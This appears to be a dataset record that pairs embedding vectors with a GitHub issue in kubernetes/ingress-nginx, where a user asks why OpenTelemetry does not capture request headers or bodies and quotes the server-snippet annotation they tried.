-0.008668262511491776, 0.026756547391414642, 0.0053773908875882626, 0.039705242961645126, 0.006942280568182468, 0.01380018051713705, -0.01814965344965458, 0.014544270001351833, 0.000601696316152811, -0.026633810251951218, 0.013539365492761135, 0.010317533276975155, 0.0006755299400538206, 0.010332874953746796, -0.008384434506297112, -0.021079985424876213, 0.017566654831171036, -0.008123619481921196, 0.009366326034069061, 0.011966804042458534, 0.006466676946729422, 0.017566654831171036, 0.01037123054265976, 0.009987679310142994, 0.009435364976525307, 0.0068962546065449715, 0.005231641232967377, 0.004414676688611507, -0.009734534658491611, 0.0029878655914217234, 0.03369115665555, -0.0346730500459671, 0.015157951973378658, -0.004268927499651909, 0.025206999853253365, -0.015418766997754574, -0.006244217045605183, 0.023780187591910362, -0.03166600689291954, -0.009343313053250313, -0.02109532803297043, -0.0000053712183216703124, 0.0033618281595408916, -0.005258489865809679, 0.017735417932271957, 0.0069576227106153965, 0.007298983633518219, 0.020972590893507004, -0.009350983425974846, 0.01264952588826418, 0.004387828055769205, -0.0024010317865759134, -0.013155813328921795, -0.013723470270633698, 0.0007071729050949216, -0.000012712632269540336, -0.029732905328273773, -0.012680210173130035, -0.019668517634272575, 0.025038236752152443, 0.015633555129170418, 0.013339918106794357, -0.028214043006300926, -0.01818033680319786, 0.0038585274014621973, -0.004341802094131708, 0.002460482297465205, 0.0017489944584667683, 0.021218065172433853, -0.0027692413423210382, -0.0008965514716692269, -0.0022725421003997326, 0.003684011287987232, 0.02385689876973629, 0.004587274976074696, -0.008606893941760063, -0.013547035865485668, 0.0043839928694069386, 0.0071187145076692104, 0.026219574734568596, -0.003988934680819511, 0.009366326034069061, 0.009435364976525307, 0.004391663707792759, -0.006838721688836813, -0.01656942069530487, -0.008729630149900913, 0.004061809740960598, -0.002213091589510441, -0.019913990050554276, 0.010095073841512203, -0.03734256699681282, 0.013431970961391926, 0.004675491712987423, -0.024501264095306396, 0.0006299832020886242, -0.002151723485440016, 0.003622643183916807, 0.00006520374154206365, -0.0010902449721470475, -0.0021210394334048033, 0.02259884960949421, -0.009458377957344055, -0.04381691291928291, 0.01572560891509056, 0.015296030789613724, -0.00216322997584939, 0.016109159216284752, -0.011744344606995583, 0.0028363626915961504, -0.008668262511491776, -0.006416815333068371, 0.006696807686239481, 0.004219065420329571, -0.008660591207444668, -0.0014977683313190937, 0.004859596490859985, 0.00809293519705534, -0.006827215198427439, -0.0029782766941934824, 0.022261325269937515, 0.0006165588856674731, -0.00648968992754817, 0.0029437572229653597, 0.021662984043359756, -0.009550430811941624, 0.004844254348427057, -0.0035900413058698177, -0.011215043254196644, 0.005208628252148628, -0.023841556161642075, -0.020589040592312813, -0.011775028891861439, -0.012204606086015701, 0.011813383549451828, -0.013746483251452446, -0.000975179485976696, 0.00010691495845094323, -0.02210790477693081, -0.004111671354621649, -0.01007205992937088, 0.011798041872680187, 0.0006961458129808307, 0.005212463904172182, 0.005438758991658688, -0.0025678768288344145, 0.01702968217432499, -0.005841488018631935, 0.0009699056390672922, 0.004107835702598095, 0.01488946657627821, -0.017397891730070114, 0.009711521677672863, -0.0018688542768359184, 0.01222761906683445, 0.01446755975484848, -0.01758199743926525, -0.013930588029325008, 0.026158206164836884, -0.002613903023302555, -0.025697944685816765, -0.009113181382417679, -0.018901413306593895, 0.014206744730472565, -0.0027097908314317465, 0.018471837043762207, 0.0010710672941058874, -0.005204792600125074, 0.0016847496153786778, 0.025375762954354286, 0.01427578367292881, 0.017474602907896042, -0.00947372056543827, -0.004456867463886738, 0.0016732431249693036, 0.026756547391414642, -0.0008735383744351566, 0.016201211139559746, 0.02074246108531952, -0.006286407820880413, 0.006827215198427439, 0.012219948694109917, -0.005956553388386965, 0.02308979630470276, -0.011636950075626373, -0.008622235618531704, 0.010171784088015556, -0.0004547481657937169, -0.0055039627477526665, 0.024577975273132324, -0.00020364183001220226, 0.0027136262506246567, 0.013884561136364937, 0.014352493919432163, 0.001081614987924695, 0.008806340396404266, -0.0027884189039468765, 0.0022169272415339947, 0.012695551849901676, -0.014122363179922104, -0.013876890763640404, 0.0017509122844785452, 0.005975731182843447, 0.003758803941309452, -0.007172411773353815, 0.01607847586274147, 0.0007110084407031536, -0.016247238963842392, -0.007475417107343674, -0.006712149828672409, -0.00530835147947073, 0.014551941305398941, -0.00015581776096951216, 0.02063506655395031, 0.014444546774029732, 0.013385944999754429, -0.0070841945707798, -0.004548919852823019, 0.010877517983317375, 0.0027673235163092613, 0.011345450766384602, -0.027983911335468292, -0.0256826039403677, -0.03513330966234207, -0.010655058547854424, -0.003743461798876524, -0.002744310535490513, -0.010064389556646347, 0.0018918673740699887, -0.00854552537202835, -0.004840419162064791, -0.011890093795955181, -0.0020040562376379967, 0.027554333209991455, -0.005246983375400305, 0.0033426505979150534, 0.0052546546794474125, 0.020052067935466766, -0.036728885024785995, 0.01776610128581524, -0.0095274168998003, 0.022967059165239334, 0.007993211969733238, -0.019070176407694817, -0.0072606285102665424, 0.011046281084418297, -0.006528045050799847, -0.015403425320982933, -0.0019004972418770194, -0.002803760813549161, 0.025621235370635986, 0.021570932120084763, 0.001655024359934032, -0.008461144752800465, 0.0013424300123006105, -0.011698318645358086, 0.011798041872680187, 0.013217181898653507, 0.0006870364886708558, 0.027661727741360664, -0.0018966618226841092, -0.009818916209042072, 0.007164740469306707, 0.00947372056543827, 0.011268740519881248, -0.0026867776177823544, 0.023734161630272865, -0.011867080815136433, -0.00416920380666852, -0.019576463848352432, -0.009880284778773785, 0.00895209051668644, 0.009397009387612343, 0.013501009903848171, 0.018441151827573776, -0.020082753151655197, 0.0048749386332929134, 0.00919756293296814, -0.004460703115910292, -0.023488689213991165, -0.021939141675829887, 0.007632673252373934, -0.01790418103337288, -0.004836583510041237, -0.015863686800003052, -0.009420023299753666, -0.009350983425974846, -0.007954856380820274, -0.013984284363687038, 0.00021898388513363898, -0.015679582953453064, 0.005388897377997637, -0.003829760942608118, 0.022614192217588425, 0.03534809872508049, -0.008829353377223015, -0.003935237415134907, -0.013853877782821655, 0.015211649239063263, -0.010187125764787197, 0.009987679310142994, -0.032003529369831085, 0.0024892487563192844, 0.0021133683621883392, 0.014912479557096958, 0.011813383549451828, 0.008131289854645729, 0.004844254348427057, -0.003747297450900078, 0.00020364183001220226, 0.00877565611153841, -0.003323473036289215, 0.011813383549451828, 0.011076965369284153, 0.00991096906363964, 0.00577244907617569, -0.012288987636566162, 0.002180489944294095, -0.009067155420780182, -0.0015351645415648818, 0.021877773106098175, -0.011844067834317684, 0.030638087540864944, 0.016170527786016464, -0.00041783132473938167, 0.019806595519185066, 0.011406819336116314, 0.0016742019215598702, 0.00021886403555981815, 0.0006879953434690833, 0.0027692413423210382, 0.007003649137914181, 0.01801157556474209, 0.0003715654311235994, -0.018349099904298782, 0.015372741036117077, 0.002504590665921569, -0.009443036280572414, 0.00420372374355793, 0.013140471652150154, -0.011146004311740398, 0.004982333164662123, -0.015687253326177597, 0.009734534658491611, 0.025759313255548477, 0.004771379753947258, -0.0003902635653503239, -0.02126409113407135, 0.0016022860072553158, 0.03706640750169754, -0.015510819852352142, 0.005534647032618523, -0.020052067935466766, 0.012273645028471947, -0.018625257536768913, -0.020788487046957016, 0.027523649856448174, -0.007007484324276447, 0.01101559679955244, 0.0006021757144480944, -0.00405413843691349, -0.010317533276975155, -0.007774587254971266, 0.010033705271780491, 0.005814639385789633, 0.008929077535867691, 0.01026383601129055, -0.026434363797307014, 0.010225481353700161, 0.0027711589355021715, -0.026787230744957924, 0.0010077813640236855, 0.0037146955728530884, 0.005108905024826527, -0.0005340953357517719, -0.007279805839061737, 0.002406785264611244, 0.009941652417182922, 0.004057974088937044, -0.009956995025277138, 0.008553196676075459, -0.01143750362098217, 0.001235035597346723, -0.020159462466835976, -0.017183104529976845, -0.019116202369332314, -0.00004500736031332053, 0.00790115911513567, 0.0015361234545707703, -0.018993467092514038, 0.0140686659142375, 0.002600478706881404, 0.004790557082742453, 0.010601361282169819, -0.010401914827525616, -0.005250819027423859, -0.001918716006912291, -0.03451962769031525, 0.008039237931370735, 0.0022629534360021353, 0.018609914928674698, -0.006554893683642149, 0.007153233978897333, 0.005369720049202442, 0.02232269197702408, -0.014206744730472565, -0.0025755479000508785, 0.005039865616708994, -0.0070995367132127285, 0.010202467441558838, 0.014620980247855186, 0.006175178103148937, 0.019714543595910072, 0.013639088720083237, 0.0190548337996006, -0.011153675615787506, -0.004107835702598095, 0.010670400224626064, 0.010678071528673172, 0.0038815403822809458, -0.0033560749143362045, -0.01037123054265976, -0.001075861742720008, 0.005841488018631935, -0.004134684335440397, -0.02038959413766861, -0.0025621235836297274, 0.010355887934565544, 0.021923799067735672, -0.010486295446753502, 0.003925648983567953, 0.005553824361413717, 0.016722841188311577, 0.0020328224636614323, 0.0056458767503499985, -0.007832120172679424, 0.009067155420780182, -0.011268740519881248, 0.0022898020688444376, -0.021524906158447266, -0.004176875110715628, -0.025375762954354286, 0.0007182000554166734, 0.008376763202250004, 0.013646760024130344, -0.02571328729391098, 0.018901413306593895, -0.016017107293009758, -0.028045279905200005, 0.01615518517792225, -0.004721518140286207, 0.021816404536366463, 0.018272390589118004, -0.006439828313887119, 0.020236173644661903, 0.024424554780125618, -0.0005964224692434072, 0.009987679310142994, -0.021172039210796356, 0.0047483667731285095, -0.017351865768432617, -0.0017911851173266768, 0.02101861871778965, -0.012764591723680496, -0.00393140222877264, 0.0059642246924340725, -0.03464236482977867, -0.009136195294559002, 0.005135753657668829, 0.01438317820429802, 0.010171784088015556, 0.013370602391660213, -0.007694041356444359, 0.0028651291504502296, -0.009772890247404575, 0.010302191600203514, 0.008852366358041763, 0.011107648722827435, 0.005722586996853352, 0.006462841294705868, 0.005852994509041309, -0.0043072826229035854, -0.01695297285914421, 0.05857597291469574, 0.0006290243472903967, 0.023872241377830505, -0.0029955366626381874, -0.010770123451948166, 0.006474347785115242, -0.005415746010839939, -0.012941025197505951, -0.009619469754397869, 0.023780187591910362, -0.0003761201223824173, -0.004882609471678734, 0.003018549643456936, -0.002611985197290778, 0.012411723844707012, -0.002464317949488759, 0.0024854131042957306, 0.0010240823030471802, -0.007962527684867382, -0.021801061928272247, -0.027140097692608833, -0.0002845472190529108, 0.032034214586019516, -0.027063388377428055, -0.0031949833501130342, -0.004963155370205641, -0.000039134229155024514, -0.022936375811696053, -0.00028574580210261047, -0.015648897737264633, 0.022690901532769203, -0.022936375811696053, 0.01755131222307682, 0.0027654056902974844, -0.004802063573151827, 0.0077630807645618916, 0.014291126281023026, 0.019883304834365845, -0.010716427117586136, -0.010118086822330952, 0.008315394632518291, 0.01804225891828537, -0.019315648823976517, 0.012181593105196953, 0.00361688993871212, -0.0010806560749188066, -0.013915245421230793, 0.005143424496054649, -0.0014133870135992765, 0.005120411515235901, 0.017397891730070114, 0.003081835573539138, -0.00031427244539372623, 0.0009075785637833178, -0.0005158766871318221, -0.02284432202577591, -0.0005072467611171305, -0.017290497198700905, 0.0024202095810323954, -0.02620423398911953, -0.0005077262176200747, -0.02003672532737255, -0.007176246959716082, -0.0038067479617893696, -0.018763335421681404, -0.017351865768432617, -0.0070995367132127285, 0.00750610139220953, -0.010754781775176525, 0.0207731444388628, 0.010041376575827599, -0.00112092902418226, -0.011606265790760517, -0.0016799552831798792, -0.003091424470767379, -0.01266486756503582, 0.003816336626186967, -0.017290497198700905, 0.008046909235417843, -0.007816777564585209, -0.01632394827902317, -0.0021958318538963795, 0.00038283225148916245, 0.00011830164294224232, 0.007552127353847027, -0.0036533272359520197, 0.004376321565359831, -0.007563633844256401, -0.014206744730472565, 0.03255584463477135, 0.015817660838365555, -0.0019388524815440178, -0.018471837043762207, -0.004894115962088108, 0.01373114064335823, -0.015065900050103664, -0.01615518517792225, -0.012350356206297874, -0.008959760889410973, 0.010754781775176525, 0.003745379624888301, 0.005549989175051451, -0.022537481039762497, -0.0018151571275666356, -0.0013625663705170155, -0.008806340396404266, 0.007694041356444359, -0.005212463904172182, -0.01919291354715824, -0.005001510493457317, 0.0033426505979150534, -0.007801435887813568, -0.01198214665055275, -0.009872613474726677, 0.020297540351748466, 0.009926310740411282, 0.010662729851901531, 0.002251446945592761, 0.01005671825259924, 0.010724097490310669, 0.001944605726748705, -0.0074792527593672276, 0.031481899321079254, 0.014245099388062954, 0.010938886553049088, 0.0007623084238730371, 0.0020385757088661194, 0.007736232131719589, -0.00107969727832824, 0.010678071528673172, -0.0021229570265859365, -0.01383853517472744, 0.03519468009471893, 0.005899020936340094, -0.003988934680819511, 0.011537226848304272, -0.018379783257842064, 0.01702968217432499, 0.016968315467238426, 0.0008361421059817076, -0.003375252475962043, 0.029963036999106407, 0.005511634051799774, 0.008599222637712955, -0.009443036280572414, 0.006136822514235973, 0.005216299556195736, 0.006505032069981098, -0.008392104879021645, -0.020021384581923485, 0.025314394384622574, 0.006194355431944132, 0.006056277081370354, 0.007939514704048634, 0.005411910358816385, 0.002897731028497219, 0.004460703115910292, 0.011552568525075912, -0.03197284787893295, -0.006290243472903967, -0.0007225149893201888, 0.010102744214236736, 0.0019043327774852514, -0.007371858227998018, 0.01521932054311037, 0.018763335421681404, -0.00013783879694528878, -0.009266601875424385, 0.030960271134972572, -0.01308677438646555, -0.02178572118282318, -0.010908202268183231, -0.00011434626503614709, -0.011307096108794212, 0.00518561527132988, 0.016753526404500008, 0.018732652068138123, 0.011644621379673481, 0.018103627488017082, 0.01741323433816433, 0.014835769310593605, 0.007172411773353815, 0.004909458104521036, 0.03019316866993904, 0.03209558129310608, -0.007855133153498173, -0.015395754016935825, -0.010854505002498627, 0.013117458671331406, 0.00034855236299335957, -0.000831347715575248, -0.01017945446074009, 0.017045024782419205, -0.00854552537202835, 0.0009109346428886056, 0.013639088720083237, 0.03341500088572502, -0.0007100495859049261, 0.014444546774029732, -0.01175201591104269, 0.003553604008629918, -0.021248748525977135, -0.014628651551902294, 0.015150281600654125 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "ingress-nginx" ]
I have deploy ingress nginx have enable opentelemetry with chart version 4.9.1 and controller version 1.9.6 But data after collect only have server_name, method, host,... but not have header, body. OpenTelemetry modules in ingress nginx cannot collect this data or missing config? I have add `opentelemetry_capture_headers on;` to server-snippets in annotation but not effect. ``` nginx.ingress.kubernetes.io/server-snippets: | location / { opentelemetry_capture_headers on; } ```
Open Telemetry can not collect header request and body
https://api.github.com/repos/kubernetes/ingress-nginx/issues/11386/comments
1
2024-05-28T04:10:31
2024-05-28T08:56:56Z
https://github.com/kubernetes/ingress-nginx/issues/11386
2,320,080,747
11,386
false
This is a GitHub Issue repo:ingress-nginx owner:kubernetes Title : Open Telemetry can not collect header request and body Issue date: --- start body --- I have deploy ingress nginx have enable opentelemetry with chart version 4.9.1 and controller version 1.9.6 But data after collect only have server_name, method, host,... but not have header, body. OpenTelemetry modules in ingress nginx cannot collect this data or missing config? I have add `opentelemetry_capture_headers on;` to server-snippets in annotation but not effect. ``` nginx.ingress.kubernetes.io/server-snippets: | location / { opentelemetry_capture_headers on; } ``` --- end body ---
691
[ 0.008743907324969769, -0.014081098139286041, -0.012050427496433258, -0.0018068960634991527, 0.01795540377497673, -0.052450086921453476, -0.024555083364248276, 0.03339918702840805, -0.031528834253549576, -0.04483507201075554, -0.002989227417856455, -0.00025779998395591974, -0.003154553472995758, 0.005270392168313265, -0.0032747904770076275, 0.02359318733215332, -0.023125598207116127, 0.006492802407592535, 0.01084805652499199, -0.008015804924070835, 0.023259194567799568, 0.0008324747905135155, 0.009946278296411037, 0.029284408316016197, 0.009946278296411037, 0.0142414141446352, -0.009906199760735035, 0.010968293994665146, -0.07449354976415634, 0.012558095157146454, -0.006466082762926817, 0.026318561285734177, 0.008363156579434872, 0.026251763105392456, 0.027160219848155975, 0.013987580314278603, 0.022150341421365738, -0.0009209826239384711, -0.01187675166875124, -0.010300309397280216, -0.046090882271528244, -0.031822748482227325, 0.024194372817873955, -0.011202087625861168, -0.020186468958854675, 0.02633192017674446, 0.046678707003593445, -0.01567089930176735, -0.016579357907176018, 0.018917299807071686, -0.011516040191054344, -0.012391098774969578, -0.06081324443221092, -0.03505579009652138, -0.021135006099939346, 0.008463354781270027, 0.09592247009277344, 0.021228523924946785, 0.002231065882369876, 0.02232401818037033, 0.011135289445519447, -0.029658479616045952, 0.02186978980898857, 0.02454172447323799, -0.009472009725868702, -0.0009243225795216858, -0.03222353756427765, 0.005243672523647547, -0.04218985512852669, 0.002665255218744278, -0.013593469746410847, 0.006315786391496658, -0.0037674284540116787, 0.057980991899967194, 0.04793451726436615, 0.007474738638848066, 0.019037537276744843, 0.024461565539240837, 0.006679837591946125, -0.003161233151331544, -0.024394767358899117, 0.03425420820713043, -0.04275096207857132, 0.030166147276759148, 0.030166147276759148, 0.007508137729018927, -0.011135289445519447, -0.06022541597485542, -0.026078086346387863, 0.021135006099939346, 0.0016925039235502481, 0.013453193008899689, -0.03652535378932953, -0.02939128689467907, 0.04721309244632721, -0.02651895582675934, -0.011970269493758678, -0.014000940136611462, -0.060492612421512604, -0.0031595632899552584, -0.03040662221610546, 0.014348291791975498, -0.015243389643728733, 0.012558095157146454, 0.0284828282892704, -0.0018402952700853348, 0.028696583583950996, -0.01580449566245079, -0.010373787954449654, 0.0830971822142601, 0.022177061066031456, -0.019197853282094002, -0.0394912026822567, -0.014588765799999237, -0.0008241249597631395, 0.0505797304213047, -0.02094797044992447, -0.011228807270526886, -0.010079875588417053, 0.011335684917867184, 0.0002527901087887585, -0.007000470068305731, -0.00701382989063859, -0.013600150123238564, -0.011068491265177727, 0.024875715374946594, -0.018302755430340767, -0.005053297150880098, -0.02309887856245041, -0.06898936629295349, 0.012898766435682774, -0.010681060142815113, 0.005043277516961098, 0.0058815972879529, 0.006886912975460291, 0.0037507289089262486, -0.03249073028564453, 0.03705973923206329, -0.022858405485749245, -0.02248433418571949, -0.01212390512228012, -0.03863618150353432, 0.011355724185705185, -0.0007727737538516521, -0.008663749322295189, -0.009939598850905895, -0.0014829239808022976, 0.024595161899924278, -0.01798212341964245, -0.009258255362510681, -0.01804892159998417, 0.014829239808022976, 0.02219042181968689, -0.024608522653579712, 0.005581004545092583, -0.026171604171395302, 0.007100667338818312, -0.011148649267852306, 0.008643710054457188, -0.012110546231269836, -0.01199030876159668, -0.015978172421455383, 0.00238303211517632, 0.03323887288570404, 0.04398005083203316, 0.002321243518963456, -0.02431461028754711, 0.010039796121418476, -0.024902435019612312, 0.030486779287457466, -0.0011948560131713748, 0.011055131442844868, 0.0019137734780088067, -0.021402200683951378, -0.04723981395363808, -0.020213188603520393, 0.02577081322669983, -0.0005456592771224678, 0.006629738956689835, 0.004061341285705566, 0.03011270798742771, 0.006389264948666096, -0.046224478632211685, -0.025276506319642067, 0.012371059507131577, 0.007347821723669767, -0.007454698905348778, -0.0032096621580421925, 0.008950982242822647, -0.01648584008216858, -0.020547181367874146, 0.006279047578573227, -0.001158116851001978, -0.01446852833032608, -0.009184776805341244, 0.001318432972766459, -0.015470503829419613, -0.04122795909643173, -0.0005089201149530709, -0.009458649903535843, 0.014495247974991798, -0.0021175085566937923, -0.03489547222852707, -0.03855602443218231, -0.001279188902117312, 0.019598644226789474, -0.027520932257175446, 0.01854323036968708, -0.016739673912525177, -0.042430330067873, -0.01462884433567524, -0.03355950489640236, 0.011562799103558064, 0.023179037496447563, -0.001932143117301166, 0.021402200683951378, -0.027347255498170853, 0.01573769748210907, -0.07160785794258118, -0.02157587558031082, 0.018209237605333328, -0.033185433596372604, -0.007140746805816889, 0.05525561794638634, -0.04694589972496033, 0.002424781210720539, -0.02925768867135048, -0.05733972787857056, 0.0029107392765581608, -0.013513311743736267, 0.017541253939270973, -0.03131508082151413, -0.03299839794635773, -0.010053155943751335, -0.0003074812702834606, -0.021909868344664574, 0.0038876656908541918, -0.027066702023148537, 0.01306576281785965, -0.009986357763409615, 0.015149871818721294, 0.05314479023218155, -0.03366638347506523, -0.03665895015001297, -0.001420300453901291, 0.007461378816515207, 0.016659514978528023, 0.017701569944620132, -0.004241697024554014, 0.01301900390535593, 0.004228337202221155, 0.011235486716032028, 0.007073948159813881, -0.018877221271395683, -0.00012086331116734073, 0.004909680690616369, -0.0021091587841510773, 0.014441809616982937, 0.014428449794650078, -0.031234921887516975, 0.03166243061423302, 0.03222353756427765, 0.0040747011080384254, -0.03011270798742771, 0.00597177492454648, -0.02925768867135048, 0.02098805084824562, 0.014041018672287464, -0.008964342065155506, 0.04210969805717468, 0.0053505501709878445, 0.007942327298223972, -0.023272555321455002, 0.04248376935720444, 0.015123153105378151, 0.024154294282197952, 0.005287091713398695, -0.03088757023215294, 0.009298333898186684, 0.02443484589457512, -0.026505596935749054, -0.03294495865702629, 0.021936587989330292, 0.012818608433008194, 0.018877221271395683, 0.005263712257146835, -0.011275566183030605, -0.0371398963034153, -0.003971163649111986, -0.030620375648140907, -0.024848995730280876, -0.005103396251797676, -0.042243294417858124, 0.02773468568921089, 0.02203010581433773, 0.020734217017889023, -0.00946533028036356, 0.029898954555392265, 0.035376422107219696, 0.032704487442970276, -0.014922757633030415, 0.0008942632703110576, 0.0063592055812478065, -0.0021676074247807264, -0.027133500203490257, 0.036578793078660965, 0.010681060142815113, -0.017541253939270973, -0.024595161899924278, -0.017608052119612694, 0.022430894896388054, -0.027814844623208046, 0.009184776805341244, -0.014775801450014114, -0.012204064056277275, 0.023740142583847046, 0.038075074553489685, 0.02925768867135048, -0.05017894133925438, -0.04721309244632721, 0.023553108796477318, -0.005090036429464817, -0.013693667016923428, 0.021615954115986824, -0.018463071435689926, -0.003264770610257983, 0.007915607653558254, 0.010600902140140533, -0.00826295930892229, -0.00033315690234303474, -0.018289396539330482, 0.02531658485531807, 0.006866873241961002, -0.026318561285734177, 0.001498788595199585, -0.0258376132696867, -0.03783459961414337, -0.03398701548576355, -0.022016745060682297, -0.005393968895077705, 0.0002469452447257936, 0.008182801306247711, -0.001070444006472826, -0.03700629994273186, 0.02450164407491684, -0.01417461596429348, -0.026906386017799377, 0.03313199430704117, 0.052049294114112854, 0.0025433481205254793, 0.0006320796674117446, 0.028456108644604683, -0.013459873385727406, 0.01186339184641838, 0.04288455843925476, -0.024221092462539673, -0.03834226727485657, 0.018743624910712242, 0.053358543664216995, 0.003637171583250165, -0.009785962291061878, -0.007802050560712814, 0.0007506467518396676, 0.06412643939256668, -0.008523472584784031, 0.03917056694626808, 0.0064727626740932465, 0.025196347385644913, -0.003453476121649146, -0.019505126401782036, -0.011162009090185165, -0.0050833565182983875, -0.03334575146436691, -0.0365520715713501, -0.041014205664396286, -0.0347885936498642, -0.043125033378601074, 0.007641734555363655, -0.006893592420965433, 0.03500235080718994, -0.026371998712420464, -0.013005644083023071, -0.0028355910908430815, 0.0005343870143406093, 0.0002350467984797433, 0.028750021010637283, 0.026532314717769623, -0.02199002541601658, 0.0006830134079791605, 0.02343287132680416, -0.015710977837443352, 0.02746749296784401, -0.015537302941083908, -0.03219681978225708, -0.030353182926774025, 0.03013942763209343, -0.025356663390994072, -0.0143883703276515, 0.020346784964203835, 0.019184494391083717, -0.010146673768758774, 0.011409162543714046, 0.011789913289248943, 0.023352712392807007, -0.015497223474085331, -0.013012323528528214, -0.004906340967863798, 0.017835166305303574, -0.008930942974984646, -0.015497223474085331, -0.0005214448319748044, -0.003757408820092678, -0.021642673760652542, -0.03086085058748722, 0.04181578382849693, 0.023780222982168198, 0.01700686663389206, -0.017407657578587532, -0.03147539496421814, 0.026732711121439934, 0.019705520942807198, 0.0004504715616349131, -0.0007130726589821279, -0.01772828958928585, 0.007795370649546385, 0.015243389643728733, -0.021642673760652542, 0.01675303280353546, 0.04053325578570366, -0.006689857691526413, -0.04112108051776886, 0.0031478735618293285, 0.02746749296784401, -0.008877504616975784, 0.0027170239482074976, -0.01202370785176754, 0.02332599274814129, -0.03786132112145424, -0.021121647208929062, 0.01967880129814148, -0.05728628858923912, 0.032437290996313095, -0.02635863982141018, -0.011128610000014305, -0.023472949862480164, 0.008336437866091728, -0.06038573384284973, -0.041628748178482056, -0.0039344243705272675, -0.01454868633300066, -0.014749081805348396, 0.04649167135357857, -0.03989199176430702, -0.03072725422680378, -0.008476713672280312, -0.005200253799557686, 0.027948440983891487, 0.004752704408019781, 0.04269752278923988, -0.019438328221440315, -0.024034056812524796, -0.005985134746879339, -0.02017311006784439, -0.004211637657135725, 0.04141499474644661, 0.020453663542866707, 0.014134536497294903, -0.032143380492925644, 0.021175086498260498, -0.008396555669605732, 0.02567729726433754, 0.008409915491938591, 0.029284408316016197, 0.018463071435689926, -0.02762780897319317, 0.03043333999812603, -0.016298804432153702, -0.0036939503625035286, 0.018302755430340767, -0.038208670914173126, 0.008710508234798908, -0.027547651901841164, 0.020507102832198143, -0.0023730124812573195, 0.003954464104026556, -0.03529626131057739, 0.018583308905363083, 0.02255113236606121, -0.011756514199078083, 0.02714686095714569, 0.05223632976412773, -0.03195634484291077, 0.004228337202221155, -0.05132787302136421, 0.007581615820527077, 0.010681060142815113, -0.0008717188029550016, -0.017487814649939537, 0.03730021417140961, -0.006636418867856264, 0.036284878849983215, -0.01432157214730978, 0.028589705005288124, -0.02212362363934517, -0.003408387303352356, 0.0009067879873327911, -0.003911044914275408, 0.07016501575708389, -0.03542986139655113, -0.006579640321433544, -0.00487962132319808, -0.028429388999938965, -0.006426003761589527, -0.03997214883565903, 0.012765170074999332, -0.002256115199998021, -0.010420546866953373, 0.005110075697302818, 0.018957380205392838, 0.032276976853609085, -0.025303225964307785, -0.009699124842882156, 0.017928684130311012, 0.009959638118743896, -0.016205286607146263, -0.0038609462790191174, 0.03163571283221245, 0.0035570135805755854, -0.01080129761248827, -0.012451217509806156, -0.01850314997136593, -0.024875715374946594, 0.0028372611850500107, 0.044167086482048035, 0.008937623351812363, 0.023740142583847046, -0.010560823604464531, 0.022003386169672012, 0.00461242813616991, -0.011516040191054344, -0.0313417986035347, 0.03551001846790314, 0.0015104783233255148, -0.02443484589457512, -0.028269072994589806, -0.00026447983691468835, -0.026532314717769623, 0.021428920328617096, 0.011836672201752663, -0.003162903245538473, 0.017287420108914375, 0.000792813254520297, 0.0360444039106369, 0.01949176751077175, -0.02114836685359478, -0.02232401818037033, 0.020747575908899307, 0.024595161899924278, 0.02072085626423359, -0.017768368124961853, -0.025957848876714706, 0.021455638110637665, -0.01723398081958294, -0.027360616251826286, -0.013553391210734844, -0.014909397810697556, -0.011308965273201466, -0.003067715559154749, -0.01583121530711651, -0.02651895582675934, 0.014936117455363274, -0.010453945957124233, -0.0009176427265629172, 0.015403705649077892, 0.018356194719672203, 0.019344810396432877, 0.027520932257175446, 0.018369553610682487, -0.018169159069657326, -0.004939740058034658, 0.006529541220515966, 0.0015447124605998397, -0.007721892558038235, -0.011395803652703762, 0.00012952623364981264, -0.02639871835708618, -0.002456510439515114, -0.006305766757577658, -0.01834283396601677, -0.013894062489271164, 0.00857023149728775, 0.006312446668744087, 0.001952182617969811, 0.00811600312590599, -0.012738450430333614, -0.007728572469204664, 0.004001223016530275, 0.060492612421512604, 0.03695286437869072, 0.027788124978542328, -0.008964342065155506, 0.012097186408936977, 0.003610452404245734, -0.019077615812420845, 0.011068491265177727, 0.050820205360651016, -0.0029908972792327404, 0.0068234545178711414, 0.0008625340415164828, 0.02909737266600132, 0.0034968950785696507, 0.00735450116917491, 0.004465471487492323, -0.031395237892866135, -0.01750117540359497, 0.01623200625181198, 0.010554143227636814, 0.0022410855162888765, 0.013894062489271164, -0.025142909958958626, 0.025530340149998665, -0.028990495949983597, 0.017554612830281258, -0.01291880663484335, 0.00850343331694603, 0.00463580759242177, 0.011455921456217766, -0.0447816327214241, -0.005066656973212957, -0.0021308681461960077, -0.026545675471425056, 0.007955687120556831, 0.00477274414151907, 0.014000940136611462, -0.010113274678587914, 0.03444124385714531, 0.020373504608869553, 0.00040141650242730975, -0.011402483098208904, -0.028135476633906364, -0.01824931614100933, 0.04678558558225632, -0.04053325578570366, 0.02981879562139511, -0.016178566962480545, -0.008222879841923714, -0.042804401367902756, 0.015096433460712433, -0.00020947553275618702, 0.021482357755303383, -0.005407328717410564, -0.01091485470533371, -0.0047894436866045, 0.011342364363372326, 0.00609201192855835, -0.014281493611633778, 0.015189951285719872, 0.02936456725001335, -0.015083073638379574, -0.008783986791968346, -0.05076676607131958, -0.02606472745537758, -0.017835166305303574, -0.027948440983891487, 0.019558565691113472, 0.0015889664646238089, -0.021482357755303383, -0.011155328713357449, 0.01462884433567524, 0.009024460799992085, 0.024087494239211082, -0.0017150483326986432, 0.00922485627233982, -0.008763947524130344, -0.03620472177863121, -0.020747575908899307, -0.006669817958027124, 0.006947031244635582, 0.0005051627522334456, -0.008971022441983223, -0.02153579704463482, -0.007695172913372517, -0.022898484021425247, 0.03468171879649162, -0.041334837675094604, -0.0025734074879437685, -0.006947031244635582, 0.013840624131262302, 0.027414053678512573, -0.007568255998194218, 0.006081992294639349, -0.004859582055360079, -0.003987863194197416, -0.003132843878120184, 0.032597608864307404, -0.009986357763409615, 0.01766149140894413, 0.011242167092859745, 0.007862169295549393, -0.03521610423922539, -0.011242167092859745, 0.0258776918053627, -0.018396273255348206, 0.020587259903550148, -0.005831498187035322, 0.01951848529279232, -0.001960532274097204, -0.0008834085310809314, 0.015710977837443352, 0.04165546968579292, -0.0035904129035770893, -0.037487249821424484, -0.006225608754903078, 0.0186100285500288, -0.045770250260829926, 0.02040022425353527, 0.027280457317829132, 0.017928684130311012, -0.01207046676427126, 0.003433436620980501, -0.02479555830359459, -0.012197383679449558, 0.00005416930798674002, -0.004926380235701799, 0.0002632273535709828, 0.03171586990356445, 0.025597138330340385, 0.018823781982064247, 0.009064540266990662, 0.01798212341964245, 0.00716746598482132, -0.033319029957056046, 0.005941715557128191, 